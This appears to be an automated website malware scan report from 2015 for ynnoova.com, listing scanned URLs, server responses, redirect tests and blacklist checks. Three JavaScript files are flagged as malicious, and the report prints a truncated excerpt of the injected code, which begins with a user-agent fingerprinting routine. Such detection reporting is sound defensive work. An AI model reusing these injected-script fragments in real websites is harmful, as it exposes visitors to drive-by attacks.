Scanned pages/files
Request | Server response | Status |
http://ynnoova.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:08 GMT Location: http://www.ynnoova.com/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:08 GMT | clean |
http://www.ynnoova.com/ | 200 OK Content-Length: 41593 Content-Type: text/html | clean |
http://www.ynnoova.com/media/system/js/mootools-core.js | 200 OK Content-Length: 98685 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/core.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:12 GMT Location: http://www.ynnoova.com/media/system/js/core.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 331 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:12 GMT | clean |
http://www.ynnoova.com/media/system/js/core.js | 200 OK Content-Length: 7107 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:13 GMT Location: http://www.ynnoova.com/media/system/js/caption.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:13 GMT | clean |
http://www.ynnoova.com/media/system/js/caption.js | 200 OK Content-Length: 3052 Content-Type: application/javascript | clean |
http://ynnoova.com/plugins/system/jcemediabox/js/jcemediabox.js?version=111 | 200 OK Content-Length: 102123 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob Antivirus reports:
http://ynnoova.com/plugins/system/modalizer/modals/jquery.min.js | 200 OK Content-Length: 93691 Content-Type: application/javascript | clean |
http://ynnoova.com/plugins/system/modalizer/modals/colorbox/jquery.colorbox-min.js | 200 OK Content-Length: 9593 Content-Type: application/javascript | clean |
http://ynnoova.com/media/system/js/mootools-more.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Sun, 14 Jun 2015 07:04:14 GMT Location: http://www.ynnoova.com/media/system/js/mootools-more.js Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 340 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Jun 2015 08:04:14 GMT | clean |
http://www.ynnoova.com/media/system/js/mootools-more.js | 200 OK Content-Length: 240654 Content-Type: application/javascript | clean |
http://ynnoova.com/cache/js-b3f0603ced230e05b13bbd397bc3d60b.php | 200 OK Content-Length: 49303 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ; Antivirus reports:
http://ynnoova.com/modules/mod_roktabs/tmpl/roktabs.js | 200 OK Content-Length: 8825 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob Antivirus reports:
http://cdn.wibiya.com/Toolbars/dir_1098/Toolbar_1098168/Loader_1098168.js | 400 Bad Request Content-Length: 270 Content-Type: text/html | clean |
http://cdn.wibiya.com/test404page.js | 400 Bad Request Content-Length: 209 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ynnoova.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Sun, 14 Jun 2015 07:04:08 GMT
Location: http://www.ynnoova.com/
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 14 Jun 2015 08:04:08 GMT
...308 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ynnoova.com
Referer: http://www.google.com/search?q=ynnoova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ynnoova.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ynnoova.com/
Result: ynnoova.com is not infected or malware details are not published yet.